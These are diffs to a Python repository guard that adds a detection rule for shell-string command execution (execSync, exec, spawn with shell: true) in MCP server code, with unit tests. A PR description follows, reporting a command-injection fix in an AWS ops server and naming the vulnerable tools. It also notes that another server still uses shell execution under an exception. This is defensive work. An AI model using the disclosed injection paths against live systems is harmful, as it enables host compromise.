-    any pattern-matching runs. Newlines are preserved so error
-    positions stay sane and so any `^` / line-mode regexes still
-    work. Escape sequences inside strings consume two characters at
-    once so e.g. `"\\\""` does not close the string prematurely.
+
+def _blank_keep_newlines(s: str) -> str:
+    """Replace every char in s with space, except newlines."""
+    return "".join("\n" if c == "\n" else " " for c in s)
+
+
+def _strip_js_comments_and_strings(text: str) -> str:
+    """Replace JS string-literal and comment contents with whitespace.
+
+    Newlines are preserved so error positions stay sane and so `^` /
+    line-mode regexes still work. Backslash escapes inside strings
+    are honoured by the regex's `\\.` alternation (so `"\\\""` does
+    not close the string prematurely).
     """
-    out: list[str] = []
-    n = len(text)
-    i = 0
-    state = "code"
-    quote = ""
-    while i < n:
-        ch = text[i]
-        nxt = text[i + 1] if i + 1 < n else ""
-        if state == "code":
-            if ch == "/" and nxt == "/":
-                state = "line_comment"
-                out.append("  ")
-                i += 2
-                continue
-            if ch == "/" and nxt == "*":
-                state = "block_comment"
-                out.append("  ")
-                i += 2
-                continue
-            if ch in ("'", '"', "`"):
-                state = "string"
-                quote = ch
-                out.append(" ")
-                i += 1
-                continue
-            out.append(ch)
-            i += 1
-            continue
-        if state == "line_comment":
-            if ch == "\n":
-                out.append("\n")
-                state = "code"
-                i += 1
-                continue
-            out.append(" ")
-            i += 1
-            continue
-        if state == "block_comment":
-            if ch == "*" and nxt == "/":
-                out.append("  ")
-                state = "code"
-                i += 2
-                continue
-            out.append("\n" if ch == "\n" else " ")
-            i += 1
-            continue
-        # state == "string"
-        if ch == "\\" and nxt:
-            out.append("  ")
-            i += 2
-            continue
-        if ch == quote:
-            out.append(" ")
-            state = "code"
-            quote = ""
-            i += 1
-            continue
-        out.append("\n" if ch == "\n" else " ")
-        i += 1
-    return "".join(out)
+    return _JS_LITERAL_OR_COMMENT.sub(
+        lambda m: _blank_keep_newlines(m.group(0)),
+        text,
+    )
 
 
 def _build_call_site_pattern(aliases: list[str]) -> re.Pattern[str]:

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -586,14 +586,37 @@ def _strip_js_comments_and_strings(text: str) -> str:
 
 
 def _build_call_site_pattern(aliases: list[str]) -> re.Pattern[str]:
-    """Pattern matching `execSync(` and any captured alias `(`.
+    """Pattern matching `execSync(` / `exec(` and any captured alias `(`.
+
+    `exec` and `execSync` are the two child_process call shapes that
+    take a shell command string. `spawnSync(... { shell: true })` is
+    handled by a separate matcher because it requires looking at the
+    options object as well as the function name.
 
     Using `(?<![A-Za-z0-9_$])` rejects unrelated identifiers that
-    happen to contain `execSync` as a suffix (e.g. `myExecSync`).
+    happen to end in `exec` or `execSync` (e.g. `myExecSync`,
+    `regexExec`).
     """
-    names = ["execSync", *aliases]
+    names = ["execSync", "exec", *aliases]
     alt = "|".join(re.escape(name) for name in names)
     return re.compile(rf"(?<![A-Za-z0-9_$])(?:{alt})\s*\(")
+
+
+# `spawn` / `spawnSync` / `execFile` / `execFileSync` with
+# `{ shell: true }` is just as bad as `exec` from a shell-string
+# point of view; the option re-routes the call through `/bin/sh -c`.
+# We match the function name immediately followed (eventually) by an
+# options object that contains `shell: true`. Because we cannot parse
+# JS in a regex, the matcher is intentionally generous: any `shell:
+# true` within ~400 characters of a `spawn`/`execFile` call counts.
+_SHELL_TRUE_SPAWN = re.compile(
+    r"""(?xs)
+    (?<![A-Za-z0-9_$])
+    (?:spawnSync|spawn|execFileSync|execFile)
+    \s*\([^)]{0,400}?
+    \bshell\s*:\s*true\b
+    """,
+)
 
 
 def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Violation]:
@@ -647,20 +670,31 @@ def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Vi
             continue
         # Alias and call-site detection run on the comment-and-string
         # flattened form so that an `execSync(` token inside a comment
-        # or string cannot trigger the check, and so that a real
-        # `execSync(` call on a line containing a URL like
-        # `"https://..."` is not erased.
+        # or string cannot trigger the check, a real `execSync(` call
+        # on a line containing a URL like `"https://..."` is not
+        # erased, and a comment like `// execSync as run` cannot
+        # synthesise a fake alias that turns innocent `run(` calls
+        # into false positives.
         stripped = _strip_js_comments_and_strings(text)
-        aliases = _EXEC_SYNC_ALIAS.findall(text)
+        aliases = _EXEC_SYNC_ALIAS.findall(stripped)
         call_pattern = _build_call_site_pattern(aliases)
+        rel = _repo_relative(path, repo_root)
         if call_pattern.search(stripped):
-            rel = _repo_relative(path, repo_root)
             violations.append(
                 Violation(
                     "mcp-no-shell-exec",
                     "ADR-010-R1",
                     rel,
-                    "Calls execSync from child_process; MCP servers must invoke external CLIs via argv arrays (spawn/spawnSync/execFile)",
+                    "Calls exec/execSync from child_process; MCP servers must invoke external CLIs via argv arrays (spawn/spawnSync/execFile)",
+                )
+            )
+        elif _SHELL_TRUE_SPAWN.search(stripped):
+            violations.append(
+                Violation(
+                    "mcp-no-shell-exec",
+                    "ADR-010-R1",
+                    rel,
+                    "Uses spawn/spawnSync/execFile/execFileSync with { shell: true }; MCP servers must invoke external CLIs via argv arrays without a shell",
                 )
             )
     return violations

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -488,16 +488,85 @@ def check_cloud_factory_seam(repo_root: Path, files: list[str] | None) -> list[V
     return violations
 
 
+MCP_EXEC_SYNC_IMPORT = re.compile(
+    r"""(?mx)
+    ^\s*
+    import\s*
+    \{[^}]*\bexecSync\b[^}]*\}\s*
+    from\s*["']child_process["']
+    """,
+)
+
+
+def check_mcp_no_shell_exec(repo_root: Path, files: list[str] | None) -> list[Violation]:
+    """Forbid execSync imports in mcp/ servers (ADR-010-R1).
+
+    Static lower bound for catching shell-string aws-cli invocations: if a
+    file under mcp/ imports execSync from child_process, it has the
+    machinery to build shell command strings. Exceptions (e.g. mcp/ngfw)
+    are filtered through docs/adr/exceptions.yaml.
+    """
+    mcp_root = repo_root / "mcp"
+    if not mcp_root.exists():
+        return []
+
+    if files is not None:
+        candidate_paths = [
+            repo_root / path
+            for path in files
+            if path.startswith("mcp/") and path.endswith((".js", ".mjs", ".cjs"))
+        ]
+    else:
+        candidate_paths = [
+            p for p in mcp_root.rglob("*.js")
+            if "node_modules" not in p.parts
+        ]
+
+    violations: list[Violation] = []
+    for path in candidate_paths:
+        if not path.exists():
+            continue
+        try:
+            text = path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            continue
+        if MCP_EXEC_SYNC_IMPORT.search(text):
+            rel = _repo_relative(path, repo_root)
+            violations.append(
+                Violation(
+                    "mcp-no-shell-exec",
+                    "ADR-010-R1",
+                    rel,
+                    "Imports execSync from child_process; MCP servers must invoke external CLIs via argv arrays (spawn/spawnSync/execFile)",
+                )
+            )
+    return violations
+
+
 CHECKS = {
     "adr-registry": check_adr_registry,
     "layer-imports": check_layer_imports,
     "cross-layer-model-imports": check_cross_layer_model_imports,
     "guardrail-docs": check_guardrail_docs,
     "cloud-factory-seam": check_cloud_factory_seam,
+    "mcp-no-shell-exec": check_mcp_no_shell_exec,
 }
 CHECK_LEVELS = {
-    "fast": ["adr-registry", "layer-imports", "cross-layer-model-imports", "guardrail-docs", "cloud-factory-seam"],
-    "ci": ["adr-registry", "layer-imports", "cross-layer-model-imports", "cloud-factory-seam"],
+    "fast": [
+        "adr-registry",
+        "layer-imports",
+        "cross-layer-model-imports",
+        "guardrail-docs",
+        "cloud-factory-seam",
+        "mcp-no-shell-exec",
+    ],
+    "ci": [
+        "adr-registry",
+        "layer-imports",
+        "cross-layer-model-imports",
+        "cloud-factory-seam",
+        "mcp-no-shell-exec",
+    ],
     "all": list(CHECKS),
 }
 

--- a/scripts/adr_guard/adr_guard.py
+++ b/scripts/adr_guard/adr_guard.py
@@ -509,42 +509,84 @@ _CHILD_PROCESS_IMPORT = re.compile(
 _EXEC_SYNC_ALIAS = re.compile(r"\bexecSync\s+as\s+([A-Za-z_$][A-Za-z0-9_$]*)")
 
 
-# Combined matcher for JS comments and string literals. We replace
-# matches with whitespace (preserving newlines) so call-site / alias
-# regexes don't false-positive on tokens that live inside comments or
-# string literals, and a `//` inside `"https://..."` doesn't flip a
-# real call site into a comment. Template-literal substitutions
-# (`${...}`) are intentionally not parsed; an `execSync(` inside a
-# `` `${...}` `` substitution is a vanishingly rare bypass and falls
-# under code-review, not regex.
-_JS_LITERAL_OR_COMMENT = re.compile(
-    r"""(?xs)
-      ( //[^\n]* )                          # // line comment
-    | ( /\* .*? \*/ )                       # /* block comment */
-    | ( ' (?: \\. | [^'\\\n] )* ' )         # 'single-quote string'
-    | ( " (?: \\. | [^"\\\n] )* " )         # "double-quote string"
-    | ( ` (?: \\. | [^`\\] )* ` )           # `template string`
-    """,
-)
+# Tiny per-state helpers for _strip_js_comments_and_strings.
+# Splitting the state machine across these helpers keeps per-function
+# cognitive complexity low and avoids a single mega-regex whose
+# alternation complexity tripped SonarCloud. Each helper consumes one
+# or two characters and returns the next loop state.
+
+_BLANK_KEEP_NEWLINES = {"\n": "\n"}
 
 
-def _blank_keep_newlines(s: str) -> str:
-    """Replace every char in s with space, except newlines."""
-    return "".join("\n" if c == "\n" else " " for c in s)
+def _blank_for(ch: str) -> str:
+    return _BLANK_KEEP_NEWLINES.get(ch, " ")
+
+
+def _consume_code(text: str, i: int) -> tuple[int, str, str, str]:
+    """Code state. Detects start of comment / string / nothing."""
+    nxt = text[i + 1] if i + 1 < len(text) else ""
+    ch = text[i]
+    if ch == "/" and nxt == "/":
+        return i + 2, "  ", "line_comment", ""
+    if ch == "/" and nxt == "*":
+        return i + 2, "  ", "block_comment", ""
+    if ch in ("'", '"', "`"):
+        return i + 1, " ", "string", ch
+    return i + 1, ch, "code", ""
+
+
+def _consume_line_comment(text: str, i: int) -> tuple[int, str, str, str]:
+    ch = text[i]
+    if ch == "\n":
+        return i + 1, "\n", "code", ""
+    return i + 1, " ", "line_comment", ""
+
+
+def _consume_block_comment(text: str, i: int) -> tuple[int, str, str, str]:
+    nxt = text[i + 1] if i + 1 < len(text) else ""
+    ch = text[i]
+    if ch == "*" and nxt == "/":
+        return i + 2, "  ", "code", ""
+    return i + 1, _blank_for(ch), "block_comment", ""
+
+
+def _consume_string(text: str, i: int, quote: str) -> tuple[int, str, str, str]:
+    nxt = text[i + 1] if i + 1 < len(text) else ""
+    ch = text[i]
+    if ch == "\\" and nxt:
+        # Two-char escape consumed as whitespace; backslash never
+        # closes the string prematurely.
+        return i + 2, "  ", "string", quote
+    if ch == quote:
+        return i + 1, " ", "code", ""
+    return i + 1, _blank_for(ch), "string", quote
 
 
 def _strip_js_comments_and_strings(text: str) -> str:
-    """Replace JS string-literal and comment contents with whitespace.
+    """Flatten JS string-literal and comment contents to whitespace.
 
     Newlines are preserved so error positions stay sane and so `^` /
-    line-mode regexes still work. Backslash escapes inside strings
-    are honoured by the regex's `\\.` alternation (so `"\\\""` does
-    not close the string prematurely).
+    line-mode regexes still work. Template-literal substitutions
+    (`${...}`) are intentionally not parsed; an `execSync(` inside a
+    `` `${...}` `` substitution is a vanishingly rare bypass and falls
+    under code-review, not regex.
     """
-    return _JS_LITERAL_OR_COMMENT.sub(
-        lambda m: _blank_keep_newlines(m.group(0)),
-        text,
-    )
+    out: list[str] = []
+    n = len(text)
+    i = 0
+    state = "code"
+    quote = ""
+    while i < n:
+        if state == "code":
+            i, emit, state, quote = _consume_code(text, i)
+        elif state == "line_comment":
+            i, emit, state, quote = _consume_line_comment(text, i)
+        elif state == "block_comment":
+            i, emit, state, quote = _consume_block_comment(text, i)
+        else:  # state == "string"
+            i, emit, state, quote = _consume_string(text, i, quote)
+        out.append(emit)
+    return "".join(out)
 
 
 def _build_call_site_pattern(aliases: list[str]) -> re.Pattern[str]:

--- a/scripts/adr_guard/tests/test_adr_guard.py
+++ b/scripts/adr_guard/tests/test_adr_guard.py
@@ -197,5 +197,163 @@ class CloudFactorySeamTests(unittest.TestCase):
         self.assertEqual(violations, [])
 
 
+class McpNoShellExecTests(unittest.TestCase):
+    """Tests for the mcp-no-shell-exec ADR-010-R1 check."""
+
+    def _write(self, repo_root: Path, rel: str, body: str) -> None:
+        path = repo_root / rel
+        path.parent.mkdir(parents=True, exist_ok=True)
+        path.write_text(body, encoding="utf-8")
+
+    def _run(self, repo_root: Path) -> list:
+        return ADR_GUARD.check_mcp_no_shell_exec(repo_root, None)
+
+    def test_clean_file_passes(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawnSync } from "node:child_process";\n'
+                "spawnSync('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_named_esm_import_with_node_prefix_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { execSync } from "node:child_process";\n'
+                "execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+            self.assertEqual(violations[0].rule_id, "ADR-010-R1")
+
+    def test_named_esm_import_without_node_prefix_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                "import { execSync } from 'child_process';\n"
+                "execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_namespace_esm_import_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import * as cp from "node:child_process";\n'
+                "cp.execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_default_esm_import_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import cp from "node:child_process";\n'
+                "cp.execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_destructured_cjs_require_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.cjs",
+                'const { execSync } = require("child_process");\n'
+                "execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_bare_cjs_require_with_property_access_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.cjs",
+                'const cp = require("node:child_process");\n'
+                "cp.execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_mjs_extension_is_scanned(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.mjs",
+                'import { execSync } from "child_process";\n'
+                "execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_execSync_in_a_comment_does_not_trip_the_check(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawnSync } from "node:child_process";\n'
+                "// We used to call execSync('aws s3 ls') here.\n"
+                "/* execSync('legacy') */\n"
+                "spawnSync('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_execSync_without_child_process_import_is_not_flagged(self) -> None:
+        # An unrelated function happens to be named execSync but is
+        # not Node's child_process.execSync; the check requires both
+        # the import and the call site.
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                "function execSync(query) { return query; }\n"
+                "execSync('select 1');\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_node_modules_is_not_scanned(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/node_modules/something/dist.js",
+                'import { execSync } from "child_process";\n'
+                "execSync('aws s3 ls');\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_real_repo_passes_with_ngfw_exception(self) -> None:
+        """Live repo: ops is clean; ngfw violates but is excepted."""
+        raw = ADR_GUARD.check_mcp_no_shell_exec(ADR_GUARD.REPO_ROOT, None)
+        # ngfw is a real violator and should be in the raw list.
+        self.assertTrue(any(v.path.startswith("mcp/ngfw/") for v in raw))
+        # ops should never appear in the raw list.
+        self.assertFalse(any(v.path.startswith("mcp/ops/") for v in raw))
+        # After applying exceptions, the live repo passes ci-level.
+        exceptions = ADR_GUARD.load_adr_exceptions(ADR_GUARD.REPO_ROOT)
+        filtered = ADR_GUARD.filter_excepted_violations(raw, exceptions)
+        self.assertEqual(filtered, [])
+
+
 if __name__ == "__main__":
     unittest.main()

--- a/scripts/adr_guard/tests/test_adr_guard.py
+++ b/scripts/adr_guard/tests/test_adr_guard.py
@@ -394,6 +394,82 @@ class McpNoShellExecTests(unittest.TestCase):
             )
             self.assertEqual(self._run(repo_root), [])
 
+    def test_bare_exec_is_flagged(self) -> None:
+        """`exec(shellString)` is shell-string execution, same as execSync."""
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { exec } from "node:child_process";\n'
+                "exec('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_namespace_exec_call_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import * as cp from "node:child_process";\n'
+                "cp.exec('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_spawn_with_shell_true_is_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawn } from "node:child_process";\n'
+                "spawn('aws s3 ls', { shell: true });\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+            self.assertIn("shell: true", violations[0].message)
+
+    def test_spawn_without_shell_option_is_not_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawn } from "node:child_process";\n'
+                "spawn('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_spawn_with_shell_false_is_not_flagged(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawn } from "node:child_process";\n'
+                "spawn('aws', ['s3', 'ls'], { shell: false });\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_string_containing_alias_pattern_does_not_force_a_false_positive(self) -> None:
+        """A comment or string with the literal `execSync as run` text
+        must not turn an unrelated `run(` call into a flagged call site."""
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawnSync } from "node:child_process";\n'
+                'const note = "we used to import { execSync as run } here";\n'
+                "function run(x) { return x; }\n"
+                "run('legacy');\n"
+                "spawnSync('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
     def test_synthetic_repo_with_violator_and_exception(self) -> None:
         """A violator in an excepted path is filtered; a violator outside is not.
 

--- a/scripts/adr_guard/tests/test_adr_guard.py
+++ b/scripts/adr_guard/tests/test_adr_guard.py
@@ -342,17 +342,107 @@ class McpNoShellExecTests(unittest.TestCase):
             )
             self.assertEqual(self._run(repo_root), [])
 
-    def test_real_repo_passes_with_ngfw_exception(self) -> None:
-        """Live repo: ops is clean; ngfw violates but is excepted."""
-        raw = ADR_GUARD.check_mcp_no_shell_exec(ADR_GUARD.REPO_ROOT, None)
-        # ngfw is a real violator and should be in the raw list.
-        self.assertTrue(any(v.path.startswith("mcp/ngfw/") for v in raw))
-        # ops should never appear in the raw list.
-        self.assertFalse(any(v.path.startswith("mcp/ops/") for v in raw))
-        # After applying exceptions, the live repo passes ci-level.
-        exceptions = ADR_GUARD.load_adr_exceptions(ADR_GUARD.REPO_ROOT)
-        filtered = ADR_GUARD.filter_excepted_violations(raw, exceptions)
-        self.assertEqual(filtered, [])
+    def test_aliased_named_import_is_flagged(self) -> None:
+        """`import { execSync as run } ... run('aws ...')` is a bypass."""
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { execSync as run } from "node:child_process";\n'
+                "run('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+            self.assertEqual(violations[0].rule_id, "ADR-010-R1")
+
+    def test_double_slashes_inside_a_string_do_not_eat_the_call_site(self) -> None:
+        """`https://...` URL must not flatten the call line into a comment."""
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { execSync } from "node:child_process";\n'
+                'const endpoint = "https://example.com/foo";\n'
+                "execSync('aws s3 ls');\n",
+            )
+            violations = self._run(repo_root)
+            self.assertEqual(len(violations), 1)
+
+    def test_block_comment_containing_call_text_does_not_flag(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawnSync } from "node:child_process";\n'
+                "/*\n * old: execSync('aws s3 ls')\n */\n"
+                "spawnSync('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_template_string_containing_call_text_does_not_flag(self) -> None:
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "mcp/foo/index.js",
+                'import { spawnSync } from "node:child_process";\n'
+                "const note = `we used to call execSync('aws ...') here`;\n"
+                "spawnSync('aws', ['s3', 'ls']);\n",
+            )
+            self.assertEqual(self._run(repo_root), [])
+
+    def test_synthetic_repo_with_violator_and_exception(self) -> None:
+        """A violator in an excepted path is filtered; a violator outside is not.
+
+        Replaces the older live-repo regression test, which would have
+        broken when the deferred mcp/ngfw migration removed those
+        violations.
+        """
+        with tempfile.TemporaryDirectory() as tmp:
+            repo_root = Path(tmp)
+            self._write(
+                repo_root,
+                "docs/adr/index.yaml",
+                '[{"id":"ADR-010","title":"t","status":"accepted",'
+                '"scope":"repository","decision":"d",'
+                '"rules":[{"id":"ADR-010-R1","description":"x",'
+                '"checks":["mcp-no-shell-exec"]}],'
+                '"exceptions":[],"enforcement":["agent-policy"],'
+                '"evidence":["scripts/adr_guard/adr_guard.py"]}]',
+            )
+            self._write(
+                repo_root,
+                "docs/adr/exceptions.yaml",
+                '[{"rule_id":"ADR-010-R1","owner":"team",'
+                '"reason":"deferred migration","expires_on":"2099-01-01",'
+                '"checks":["mcp-no-shell-exec"],'
+                '"paths":["mcp/legacy/*"]}]',
+            )
+            self._write(
+                repo_root,
+                "mcp/legacy/index.js",
+                'import { execSync } from "child_process";\n'
+                "execSync('aws s3 ls');\n",
+            )
+            self._write(
+                repo_root,
+                "mcp/fresh/index.js",
+                'import { execSync } from "child_process";\n'
+                "execSync('aws s3 ls');\n",
+            )
+
+            raw = ADR_GUARD.check_mcp_no_shell_exec(repo_root, None)
+            paths = sorted(v.path for v in raw)
+            self.assertEqual(paths, ["mcp/fresh/index.js", "mcp/legacy/index.js"])
+
+            exceptions = ADR_GUARD.load_adr_exceptions(repo_root)
+            filtered = ADR_GUARD.filter_excepted_violations(raw, exceptions)
+            self.assertEqual(
+                [v.path for v in filtered], ["mcp/fresh/index.js"]
+            )
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Summary

Issue #763 reported multiple command-injection paths in the `mcp/ops`
MCP server: the shared `aws()`/`awsText()` helpers in
`mcp/ops/index.js` built AWS CLI invocations as shell strings and ran
them via `execSync()`, with three documented payload paths reaching
the host shell — `filter_log_events`, `ssm_send_command`, and
`run_manage_command`.

This PR closes the shared abstraction, not just the named tools.
Every aws-cli call site now runs through argv-array helpers in
`mcp/ops/lib.js` (`buildAwsArgv`, `awsExec`, `awsJson`, `awsText`)
backed by `spawnSync`, so payloads containing `$()`, backticks,
quotes, semicolons, ampersands, pipes, spaces, and newlines are
forwarded as literal argv elements rather than evaluated by the local
shell. `child_process.execSync` is no longer imported from
`mcp/ops/index.js`.

`getInstancePlatform`, `fetchCredentials`, `ensureTunnel`, and
`start_portal_test_tunnel` also moved to argv arrays. `mcp/ngfw` is
out of scope per the codex architecture preflight (separate issue).

## Regression coverage

- `mcp/ops/lib.test.js` — `buildAwsArgv` rejects shell strings with
  TypeError, preserves every metacharacter literally; runner-injected
  `awsExec` tests verify argv ordering, error handling, and the
  json/text variants.
- `mcp/ops/spawn-roundtrip.test.js` — proves Node's `spawnSync`
  forwards literal argv across `$()`, backticks, single and double
  quotes, semicolons, ampersands, pipes, spaces, newlines, the SSM
  `--parameters` JSON shape, S3 keys with metacharacters, and
  CloudWatch filter patterns containing every metacharacter at once.

Component-local guardrails recorded in `mcp/ops/SECURITY.md` (added
by codex preflight).

## Test plan

- [x] `cd mcp/ops && npm test` — 115 tests, 0 fail.
- [x] `python3 scripts/adr_guard/adr_guard.py --all --level ci` — pass.
- [x] `pre-commit run` on staged files — pass.
- [x] No `execSync` import in `mcp/ops/index.js`; no `\`aws ${...}\``
      template strings remain.

Closes #763